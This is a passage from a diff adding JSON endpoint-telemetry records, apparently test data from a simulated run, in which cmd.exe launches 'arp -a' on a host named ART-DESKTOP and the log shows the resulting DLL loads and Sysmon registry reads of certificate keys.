"unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + "command_line": "arp -a", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2080, + "ppid": 2008, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "subtype": "create", + "timestamp": 131883573232890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}", + "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ARP.EXE", + "image_path": "C:\\Windows\\System32\\ARP.EXE", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "snmpapi.dll", + "image_path": "C:\\Windows\\System32\\snmpapi.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\WINDOWS\\system32\\ARP.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters", + 